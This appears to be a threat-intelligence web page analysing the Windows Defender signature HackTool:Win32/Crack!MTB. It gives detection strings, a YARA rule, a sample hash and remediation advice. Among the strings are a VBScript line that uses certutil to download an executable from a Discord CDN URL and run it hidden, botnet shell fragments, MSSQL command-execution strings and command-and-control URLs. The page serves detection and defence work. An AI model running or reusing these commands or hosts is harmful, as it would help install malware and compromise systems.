user@threatcheck.sh ~ threat-analysis
bash
$ analyze-threat HackTool:Win32/Crack!MTB
HackTool:Win32/Crack!MTB - Windows Defender threat signature analysis

HackTool:Win32/Crack!MTB - Windows Defender Threat Analysis

$ cat analysis.txt
=== THREAT ANALYSIS REPORT ===
Threat Name: HackTool:Win32/Crack!MTB
Classification:
Type:HackTool
Platform:Win32
Family:Crack
Detection Type:Concrete
Known malware family with identified signatures
Suffix:!MTB
Detected via machine learning and behavioral analysis
Detection Method:Behavioral
Confidence:Very High
False-Positive Risk:Low

Concrete signature match: Hack Tool - Tool used to exploit vulnerabilities for 32-bit Windows platform, family Crack

Summary:

This concrete detection identifies a hack tool designed to bypass software protection. It carries significant risk, as it's strongly associated with known malware families like Brontok and JowoBot, potentially facilitating information theft and botnet activities.

Severity:
High
VDM Static Detection:
Relevant strings associated with this threat:
 - proxy.txt (PEHSTR)
 - CracksAll (PEHSTR)
 - SOFTWARE\KAZAA\LocalContent (PEHSTR)
 - \cmd.exe (PEHSTR)
 - spybot1.2c (PEHSTR)
 - AVP_Crack.exe (PEHSTR)
 - zoneallarm_pro_crack.exe (PEHSTR)
 - AVP_Crack (PEHSTR)
 - Cracker Game. (PEHSTR)
 - XXX Virtual Sex. (PEHSTR)
 - Credit Card. (PEHSTR)
 - Hacker. (PEHSTR)
 - Norton Keygen. (PEHSTR)
 - Hotmail Hack. (PEHSTR)
 - ICQ Hack. (PEHSTR)
 - porn. (PEHSTR)
 - crack. (PEHSTR)
 - \Kazza (PEHSTR)
 - \Morpheus (PEHSTR)
 - \Grokster (PEHSTR)
 - \Bearshare (PEHSTR)
 - \Gnucleus (PEHSTR)
 - \Edonkey2000\Incoming (PEHSTR)
 -    BRONTOK.C[22] (PEHSTR)
 - A######################### BRONTOK.C[22] ######################### (PEHSTR)
 - #JowoBot-CrackHost (PEHSTR)
 - #JowoBot-VM Community (PEHSTR)
 - Brontok.A (PEHSTR)
 - Brontok.A.HVM31 (PEHSTR)
 - /aff-light/affcgi/installed.fcgi?userid=20001 (PEHSTR_EXT)
 - /aff-light/affcgi/install.php?userid=20001 (PEHSTR_EXT)
 - \ServicePackFiles\i386\mswsock.dll (PEHSTR_EXT)
 - http://litlemouse.info/a/49.dat (PEHSTR_EXT)
 - /cgi-script/repeaterm3.fcgi?v5 (PEHSTR_EXT)
 - Content-Type: image/x-gif (PEHSTR_EXT)
 - Content-Type: image/gif (PEHSTR_EXT)
 - \dllcache\mswsock.dll (PEHSTR_EXT)
 - InternetCrackUrlA (PEHSTR_EXT)
 - \mswsockhh.dll (PEHSTR_EXT)
 - gif/chgif.exe (PEHSTR_EXT)
 - \mswsock.bak (PEHSTR_EXT)
 - png/png.exe (PEHSTR_EXT)
 - jpg/jpg.exe (PEHSTR_EXT)
 - 6Dis iz ToTo V.1 ... Dont worry ! Everything is Okey...2 (PEHSTR)
 - C:\WINDOWS\SYSTEM32\autoexec.nt2 (PEHSTR)
 - 0@COPY C:\WINDOWS\svhost.bak C:\WINDOWS\Adobe.exe (PEHSTR)
 - MSN_Hacker_v3.exe (PEHSTR)
 - Windows_Vista_Activation.exe (PEHSTR)
 - Windows_Vista_Crack.exe (PEHSTR)
 - Nero_7_Keygen.exe (PEHSTR)
 - Yahoo_Hacker_V2.exe (PEHSTR)
 - NAV_2006_Keygen.exe (PEHSTR)
 - Office_2007_Crack.exe (PEHSTR)
 - Visual_Studio_2005_Crack.exe (PEHSTR)
 - Hotmail_Hack_V1.exe (PEHSTR)
 -  C:\Program Files\eMule\Incoming\ (PEHSTR)
 - !C:\Program Files\Kazaa\My Shared\ (PEHSTR)
 - /C:\Program Files\StreamCast\Morpheus\My Shared\ (PEHSTR)
 - chgif.exe (PEHSTR_EXT)
 - Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv: (PEHSTR_EXT)
 - Setup.zip.exe (PEHSTR)
 - p2pex.zip.exe (PEHSTR)
 - www.regione.calabria.it (PEHSTR)
 - -Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR)
 - You Are Empty.zip.exe (PEHSTR)
 - Windows Xp on PsP.zip.exe (PEHSTR)
 - Half Life 2 Episode One.zip.exe (PEHSTR)
 - DOOM 3 Full 3 CD Bonus.zip.exe (PEHSTR)
 - -Windows Vista Ultimate SP3 2007 Crack.zip.exe (PEHSTR)
 - InternetCrackUrlAd (PEHSTR)
 - 202.67.220.219/trafc-2/rfe.phpd (PEHSTR)
 - search.about.com (PEHSTR)
 - search.aol.co (PEHSTR)
 - search.asiaco.com (PEHSTR)
 - search.daum.net (PEHSTR)
 - search.dmoz.org (PEHSTR)
 - search.earthlink.net (PEHSTR)
 - search.gohip.com (PEHSTR)
 - search.looksmart.com (PEHSTR)
 - search.lycos.co.uk (PEHSTR)
 - search.lycos.com (PEHSTR)
 - search.msn.co (PEHSTR)
 - search.msn.fr (PEHSTR)
 - search.netscape.com (PEHSTR)
 - search.netzero.net (PEHSTR)
 - search.sympatico.msn.ca (PEHSTR)
 - search.wanadoo.co.uk (PEHSTR)
 - search.xtramsn.co.nz (PEHSTR)
 - search.yahoo.co (PEHSTR)
 - %s + CRACK + ACTIVATOR.EXE (PEHSTR)
 - %s + CRACK + NOCD.exe (PEHSTR)
 - %s - NoCD Crack KeyGen.exe (PEHSTR)
 - back.hasteman.com (PEHSTR)
 - ads.zablen.com (PEHSTR)
 - "rel.statadd.com/d/dn/dll/zlib1.dll (PEHSTR)
 - C:\TEMP\win32.dll (PEHSTR)
 - https\shell\open\command (PEHSTR)
 - SOFTWARE\Borland\Delphi\RTL (PEHSTR)
 - ;Software\Microsoft\Windows\CurrentVersion\Internet Settings (PEHSTR)
 - Steam PW - Cracker (PEHSTR)
 - Fuck the one who is trying to Crack this Application :D                     _From B56mx ! (PEHSTR_EXT)
 - C:\WINDOWS\system32\MSVBVM60.DLL\3 (PEHSTR_EXT)
 - Fuck the one who is trying to Crack this Application :D (PEHSTR_EXT)
 - DllCanUnloadNow (PEHSTR_EXT)
 - DllGetClassObject (PEHSTR_EXT)
 - DllRegisterServer (PEHSTR_EXT)
 - DllUnregisterServer (PEHSTR_EXT)
 - CMD One (PEHSTR_EXT)
 - CrackMe.sys (PEHSTR_EXT)
 - MapleStory*.ini (PEHSTR_EXT)
 - SSDTShellHook.dll (PEHSTR_EXT)
 - ws2_32.dll (PEHSTR_EXT)
 - steamcrack (PEHSTR_EXT)
 - Steam Game Cracker (PEHSTR_EXT)
 - ,bot.cjfeeds.com/tasks.php?cj=%s&domain=%s&v= (PEHSTR)
 - cjb\cjb8.exe (PEHSTR)
 - -SOFTWARE\Microsoft\Windows\CurrentVersion\Run (PEHSTR)
 - InternetCrackUrlA (PEHSTR)
 - %s\%s\calc.cfg (PEHSTR_EXT)
 - %s\%s\calc.exe (PEHSTR_EXT)
 - %s - NoCD Crack KeyGen.exe (PEHSTR_EXT)
 - %s Crack Patch Serial Keygen.exe (PEHSTR_EXT)
 - %s + CRACK + NOCD.exe (PEHSTR_EXT)
 - %s + CRACK + ACTIVATOR.EXE (PEHSTR_EXT)
 - %s keygen crack patch.exe (PEHSTR_EXT)
 - %s_crack_keygen.exe (PEHSTR_EXT)
 - dnshop.com (PEHSTR)
 - ilikeclick.com (PEHSTR)
 - interich.com (PEHSTR)
 - linkprice.com (PEHSTR)
 - HttpOpenRequestA (PEHSTR)
 - GET /search.php?p=%04d&s=%s&v=%s&t=%ld&q=%s HTTP/1.1 (PEHSTR_EXT)
 - .assembly (PEHSTR_EXT)
 - 123812938y1293812y39128y312983.dat (PEHSTR_EXT)
 - /url? (PEHSTR_EXT)
 - /aclk? (PEHSTR_EXT)
 - etCrackU (PEHSTR_EXT)
 -  I got infected from REMOVABLE DEVICE. (PEHSTR_EXT)
 - \\.\blzblzblz (PEHSTR_EXT)
 - \drivers\blzblzblz.sys (PEHSTR_EXT)
 - SbieDll.dll (PEHSTR_EXT)
 - L4F-Left4Dead-Online-Crack (PEHSTR_EXT)
 - \blazewrm.vmx (PEHSTR_EXT)
 - Crypt\DarEye (PEHSTR_EXT)
 - Cracked by (PEHSTR_EXT)
 - CrackIt_Click (PEHSTR)
 - winrt_cracking\ (PEHSTR)
 - Hschtasks /change /disable /TN "\Microsoft\Windows\WS\License Validation" (PEHSTR)
 - SmartStealer Cracked (PEHSTR_EXT)
 - //%s:8888/ups.rar (PEHSTR_EXT)
 - //%s:8888/wpd.dat (PEHSTR_EXT)
 - //%s:8888/wpdmd5.txt (PEHSTR_EXT)
 - //down2.b5w91.com:8443 (PEHSTR_EXT)
 - /shell?%s (PEHSTR_EXT)
 - ;exec sp_add_jobserver (PEHSTR_EXT)
 - ;EXEC sp_droplogin (PEHSTR_EXT)
 - ;exec(@a); (PEHSTR_EXT)
 - <sip:carol@chicago.com> (PEHSTR_EXT)
 - @name='bat.exe',@freq_type=4,@active_start_date (PEHSTR_EXT)
 - @shell INT EXEC SP_ (PEHSTR_EXT)
 - [Cracker:CCTV] (PEHSTR_EXT)
 - [Cracker:MSSQL] (PEHSTR_EXT)
 - [Cracker:MSSQL] Host:%s, blindExec CMD: %s (PEHSTR_EXT)
 - [Cracker:RDP] (PEHSTR_EXT)
 - [Cracker:Telnet] (PEHSTR_EXT)
 - [Cracker] (PEHSTR_EXT)
 - [ExecCode] (PEHSTR_EXT)
 - [ExecCode]AUTHORIZATION [dbo] FROM 0x4D5A (PEHSTR_EXT)
 - \Run','rundll32'; (PEHSTR_EXT)
 - Cracking Firewall (PEHSTR_EXT)
 - hackerBoi\hackerBoi\obj\Debug\hackerBoi.pdb (PEHSTR_EXT)
 - Setup=KMSpico-setup.exe (PEHSTR_EXT)
 - Setup=kmsh.exe (PEHSTR_EXT)
 - Setup=dllservsys.exe (PEHSTR_EXT)
 - Setup=kmsb.exe (PEHSTR_EXT)
 - Setup=kmspicoh.exe (PEHSTR_EXT)
 - Setup=kmsdlli.exe (PEHSTR_EXT)
 - Setup=kmspicov.exe (PEHSTR_EXT)
 - FullCrack.vn_KMSpico_10. (PEHSTR_EXT)
 - _setup.rar (PEHSTR_EXT)
 - Password : fullcrack.vn (PEHSTR_EXT)
 - \KMSpico-setup.exe (PEHSTR_EXT)
 - \kmsdll.exe (PEHSTR_EXT)
 - Password Cracker.exe (PEHSTR)
 - Hotmail Hacker.exe (PEHSTR)
 - NetBIOS Hacker.exe (PEHSTR)
 - ICQ Hacker.exe (PEHSTR)
 - Website Hacker.exe (PEHSTR)
 - Keylogger.exe (PEHSTR)
 - CometHitMove (PEHSTR_EXT)
 - i2.tietuku.com/ (PEHSTR_EXT)
 - League of Legends.exe (PEHSTR_EXT)
 - lol.launcher_tencent.exe (PEHSTR_EXT)
 - LolClient.exe (PEHSTR_EXT)
 - CrackMe (PEHSTR_EXT)
 - path.ini (PEHSTR_EXT)
 - .tietuku.com/ (PEHSTR_EXT)
 - HttpCrackUrl (PEHSTR_EXT)
 - shield_2345explorer.exe (PEHSTR_EXT)
 - Cracker Jack (PEHSTR_EXT)
 - CrackingPatching (PEHSTR_EXT)
 - IDMan.exe (PEHSTR_EXT)
 - crackingpatching.com (PEHSTR_EXT)
 - combobox (PEHSTR_EXT)
 - Polish Medical Mailing Sp. z o.o. (PEHSTR_EXT)
 - Crack (PEHSTR_EXT)
 - WinRAR Cracker Edition Patch (PEHSTR_EXT)
 - syborg1finf.exe (PEHSTR_EXT)
 - Cracked (PEHSTR_EXT)
 - RarExtInstaller.pdb (PEHSTR_EXT)
 - C:\NeverShow.txt (PEHSTR_EXT)
 - repacks.ddns.net (PEHSTR_EXT)
 - repack.me (PEHSTR_EXT)
 - cracker (PEHSTR_EXT)
 - s:\IDM_projects\IDMIECC2\64bit\ReleaseMinDependency\IDMIECC64.pdb (PEHSTR_EXT)
 - Activate.cmd (PEHSTR_EXT)
 - PureFlat.tbi (PEHSTR_EXT)
 - RIPPGrazey / PHF (PEHSTR)
 - CONVGrazey / PHF (PEHSTR)
 - JamCrackerPro (PEHSTR)
 - keygenned by ice/BRD (PEHSTR_EXT)
 - rarreg.key (PEHSTR_EXT)
 - kentpw@norwich.net (PEHSTR_EXT)
 - GDIScreenShot (PEHSTR_EXT)
 - HttpOpenRequestA (PEHSTR_EXT)
 - PasswordsList.txt (PEHSTR_EXT)
 - ShellExecuteExW (PEHSTR_EXT)
 - HttpSendRequestA (PEHSTR_EXT)
 - HttpAddRequestHeadersA (PEHSTR_EXT)
 - Browsers\Cookies (PEHSTR_EXT)
 - Full-Source_ShareAppsCrack.com (PEHSTR_EXT)
 - C:\Users\HiddenTask\Downloads (PEHSTR_EXT)
 - UXTHEME.DLL (PEHSTR_EXT)
 - SOFTWARE\Borland\Delphi\RTL (PEHSTR_EXT)
 - shutdowntimer.Properties.Resources (PEHSTR_EXT)
 - CrackerBarrelGame.Resources (PEHSTR_EXT)
 - SecurityContextRunData.Resources (PEHSTR_EXT)
 - Softworks_Rhino.Resources (PEHSTR_EXT)
 - Grpppmde.pdb (PEHSTR_EXT)
 - \Windows\Temp\Magix.exe (PEHSTR_EXT)
 - video_pro_x.exe (PEHSTR_EXT)
 - CrackGen (PEHSTR_EXT)
 - /_/_/_/_/_/ (PEHSTR_EXT)
 - commdlg_FindReplace (PEHSTR_EXT)
 - Mqypdx\egc (PEHSTR_EXT)
 - WinHttpCrackUrl (PEHSTR_EXT)
 - Read Icon List for Delphi 3.0 (PEHSTR_EXT)
 - Glyph.Data (PEHSTR_EXT)
 - lld.isma\23metsyS\swodniW\:C (PEHSTR_EXT)
 - WinHttpCheckPlatform (PEHSTR_EXT)
 - ilia@valley.ru (PEHSTR_EXT)
 - WndProcPtr%.8X%.8X (PEHSTR_EXT)
 - vcltest3.dll (PEHSTR_EXT)
 - Delphi.Ru (PEHSTR_EXT)
 - winhttp (PEHSTR_EXT)
 - FortniteRubiconCracked (PEHSTR_EXT)
 - uplooder.net (PEHSTR_EXT)
 - wener/ gifnocpi (PEHSTR_EXT)
 - esaeler/ gifnocpi (PEHSTR_EXT)
 - Server_Crack.rar (PEHSTR)
 - \WinH%c%c%c32.exe (PEHSTR)
 - C:\Program Files\7rar\ (PEHSTR)
 - HTTPWebNode.Agent (PEHSTR_EXT)
 - Borland SOAP 1.2 (PEHSTR_EXT)
 - Borland_Protector Cracked v1.0 (PEHSTR_EXT)
 - WpfPdfUnblocker.My.Resources (PEHSTR_EXT)
 - //cdn.discordapp.com/attachments/ (PEHSTR_EXT)
 - //github.com/ (PEHSTR_EXT)
 - scr.jpg (PEHSTR_EXT)
 - System.txt (PEHSTR_EXT)
 - ip.txt (PEHSTR_EXT)
 - = Shell("cmd /c certutil.exe -urlcache -split -f ""https://cdn.discordapp.com/attachments/984522909378809948/984528744188346428/NetflixCrackers_Bsjfstey.jpg"" Qwjuqoncb.exe.exe && Qwjuqoncb.exe.exe", vbHide) (MACROHSTR_EXT)
 - CrackNames: 0x (PEHSTR_EXT)
 - ] Screenshot downloaded: (PEHSTR_EXT)
 - ADAC Routenplaner 2005-2006_keygen.exe (PEHSTR_EXT)
 - Age Of Mythology no cd crack.exe (PEHSTR_EXT)
 - Empire_At_War_NOCD_Crack.exe (PEHSTR_EXT)
 - F.E.A.R CD and EXE Crack+keygen.exe (PEHSTR_EXT)
 - Animation Workshop KeyGen.exe (PEHSTR_EXT)
 - Harry Potter and The Sorcerers Stone no cd crack.exe (PEHSTR_EXT)
 - InternetCrackUrlW (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
 - krrewiaog3u4npcg.onion.to/sl/gate.php (PEHSTR_EXT)
 - /root/botnet/client/ (PEHSTR_EXT)
 - new_botnet/s (PEHSTR_EXT)
 - new_botnet/ra (PEHSTR_EXT)
 - main.Att (PEHSTR_EXT)
 - main.ini (PEHSTR_EXT)
 - main.RunWi (PEHSTR_EXT)
 - main.AntiCr (PEHSTR_EXT)
 - main.LinuxSt (PEHSTR_EXT)
 - eq.main.BotInf (PEHSTR_EXT)
 - killall i .i mozi.m Mozi.m mozi.a Moz (PEHSTR_EXT)
 - .a kaiten Nbrute minerd (PEHSTR_EXT)
 - chmod 755 zero.%s; ./z (PEHSTR_EXT)
 - ro.%sGET %s HTTP/%s (PEHSTR_EXT)
 - 287/76/248/6;25125 (PEHSTR_EXT)
 - selfRepo.Teln (PEHSTR_EXT)
 - tCracker (PEHSTR_EXT)
 - Users\Nisha\Desktop\Cracked PasteBin - 1337\Cracked PasteBin\obj\Debug\Setup.pdb (PEHSTR_EXT)
 - Cracked_PasteBin.My (PEHSTR_EXT)
 - Asgard-Crack (PEHSTR_EXT)
 - Cracked Venom Rootkit (PEHSTR_EXT)
 - 0D/}. (SNID)
 - .<?wpu'&@N9 (SNID)
 - Tom Clancys Ghost Recon - Desert Siege no cd crack.exe (PEHSTR_EXT)
 - Sponge Bob Square Pants - Operation Krabby Patty no cd crack.exe (PEHSTR_EXT)
 - balROK_state[Crack].EXE (PEHSTR_EXT)
 - Star Wars - Jedi Knight - Jedi Academy no cd crack.exe (PEHSTR_EXT)
 - Command & Conquer - Generals no cd crack.exe (PEHSTR_EXT)
 - RollerCoaster Tycoon NO CD Crack (Including Attractions Pack).exe (PEHSTR_EXT)
 - Call Of Duty no cd crack.exe (PEHSTR_EXT)
 - /config/gjc.txt (PEHSTR_EXT)
 - mobile.yangkeduo.com (PEHSTR_EXT)
 - item.taobao.com (PEHSTR_EXT)
 - ShellExecuteA (PEHSTR_EXT)
 - V5m.com (PEHSTR_EXT)
 - browser.Credential (PEHSTR_EXT)
 - FirefoxCrackLoginData (PEHSTR_EXT)
 - Dont Crack My Program (PEHSTR_EXT)
 - klassifikationen.Sur (PEHSTR_EXT)
 - mediative\prioriteterne\smuglings (PEHSTR_EXT)
 - beklages.lnk (PEHSTR_EXT)
 - Besaetter\Propagandism.Ens (PEHSTR_EXT)
 - bassetternes.for (PEHSTR_EXT)
 - Crackerberry (PEHSTR_EXT)
 - upstay.fac (PEHSTR_EXT)
 - septenarii\pelsbereder\sammenfatningen (PEHSTR_EXT)
 - suderne.fas (PEHSTR_EXT)
 - stratificerendes.hen (PEHSTR_EXT)
 - Partaker195.est (PEHSTR_EXT)
 - merinould.mon (PEHSTR_EXT)
 - fraadserierne.rip (PEHSTR_EXT)
 - Dear Cracker , Please immediately stop the anti compiler behavior (PEHSTR_EXT)
 - Anti cracking service By (PEHSTR_EXT)
 - www.you-m.com/do.aspx (PEHSTR_EXT)
 - 8@VBScript.RegExp (PEHSTR_EXT)
 - 202.189.7.231 (PEHSTR_EXT)
 - eaigpuex.dll (PEHSTR_EXT)
 - Eai.dll (PEHSTR_EXT)
 - HttpModRespDLLx64.pdb (PEHSTR_EXT)
 - HttpModDLL.dll (PEHSTR_EXT)
 - 2$.`j-f (SNID)
 - software\searchhook (REGKEY)
 - WinGenerics.dll (PEHSTR)
 - InternetCrackUrl (PEHSTR)
 - Software\Apropos\Client (PEHSTR_EXT)
 - AproposUninst.ini (PEHSTR_EXT)
 - adchannel.a (PEHSTR_EXT)
 - Software\AdMedia\Client (PEHSTR_EXT)
 - AdMediaUninst.ini (PEHSTR_EXT)
 - Winhelper::Registry::read_string: RegQueryValueEx failed. Last error = 0x (PEHSTR_EXT)
 - http://66.98.138.92/PH/ (PEHSTR_EXT)
 - SOFTWARE\Apropos\Client (PEHSTR_EXT)
 - /status (PEHSTR_EXT)
 - WinGenerics.dll (PEHSTR_EXT)
 - download.contextplus.net (PEHSTR_EXT)
 - adchannel.contextplus.net (PEHSTR_EXT)
 - /apropos/client/LDV_<<version>> (PEHSTR_EXT)
 - /shared/Msvcp60Installer.exe (PEHSTR_EXT)
 - /services/AUServer (PEHSTR_EXT)
 - HookDll.dll (PEHSTR_EXT)
 - http://download.contextplus.net/shared/Msvcp60Installer.exe (PEHSTR_EXT)
 - Software\AutoLoader (PEHSTR_EXT)
 - 4Fuck the one who is trying to Crack this Application (PEHSTR)
 - /cnt.jpg (PEHSTR_EXT)
 - %s\%c%c%c%c%c.%s (PEHSTR_EXT)
 - Explorer.exe (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion (PEHSTR_EXT)
 - explorer.exe (PEHSTR_EXT)
 - http://85 (PEHSTR_EXT)
 - InitializeSecurityDescriptor (PEHSTR_EXT)
 - SetSecurityDescriptorDacl (PEHSTR_EXT)
 - SOFTWARE\Microsoft\Windows\CurrentVersion (PEHSTR_EXT)
 - SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ (PEHSTR_EXT)
 - Software\Microsoft\Internet Explorer\TypedURLsL (PEHSTR_EXT)
 - http://5starvideos.com/main/K (PEHSTR_EXT)
 -  usage count exceeded, please download a new version.2 (PEHSTR_EXT)
 - SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\X Password Generator (PEHSTR_EXT)
 - Software\Microsoft\Internet Explorer\TypedURLsd (PEHSTR_EXT)
 - http://www.xpassgenerator.com/software/d (PEHSTR_EXT)
 - http://5starvideos.com/main/ (PEHSTR_EXT)
 - X Password Generator usage count exceeded, please download a new version.K (PEHSTR_EXT)
 - X Password Generator installation information was corrupted, please reinstall X Password Generator. (PEHSTR_EXT)
 - SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PornPass Manager (PEHSTR_EXT)
 - http://www.pornpassmanager.com/d (PEHSTR_EXT)
 - PornPass Manager usage count exceeded, please download a new version.K (PEHSTR_EXT)
 - PornPass Manager installation information was corrupted, please reinstall PornPass Manager. (PEHSTR_EXT)
 - Title="Crack and Serial" (PEHSTR)
 - BeginPrompt="Disable antiviruses before patching!\nContinue?" (PEHSTR)
 - RunProgram="setup.bat" (PEHSTR)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
YARA Rule:
rule HackTool_Win32_Crack_2147745913_0
{
    meta:
        author = "threatcheck.sh"
        detection_name = "HackTool:Win32/Crack!MTB"
        threat_id = "2147745913"
        type = "HackTool"
        platform = "Win32: Windows 32-bit platform"
        family = "Crack"
        severity = "High"
        info = "MTB: Microsoft Threat Behavior"
        signature_type = "SIGNATURE_TYPE_PEHSTR_EXT"
        threshold = "6"
        strings_accuracy = "High"
    strings:
        $x_2_1 = "RarExtInstaller.pdb" ascii //weight: 2
        $x_1_2 = "C:\\NeverShow.txt" ascii //weight: 1
        $x_1_3 = "OnClick" ascii //weight: 1
        $x_1_4 = "repacks.ddns.net" ascii //weight: 1
        $x_1_5 = "repack.me" ascii //weight: 1
        $x_1_6 = "Activation" ascii //weight: 1
    condition:
        (filesize < 20MB) and
        (
            ((1 of ($x_2_*) and 4 of ($x_1_*))) or
            (all of ($x*))
        )
}
Known malware which is associated with this threat:
Filename: conspiracy.exe
c3d568da2c0055824bfc629de90970014fe15164693f7acc478dc7e06891516f
04/01/2026
Remediation Steps:
Isolate the affected system, perform a comprehensive antivirus scan to remove the threat and any associated malware, and educate users on avoiding unauthorized software sources.
=== END REPORT ===
$ reanalyze-threat
This analysis was last updated on 03/01/2026. Do you want to analyze it again?
$ ls available-commands/
user@threatcheck.sh:~$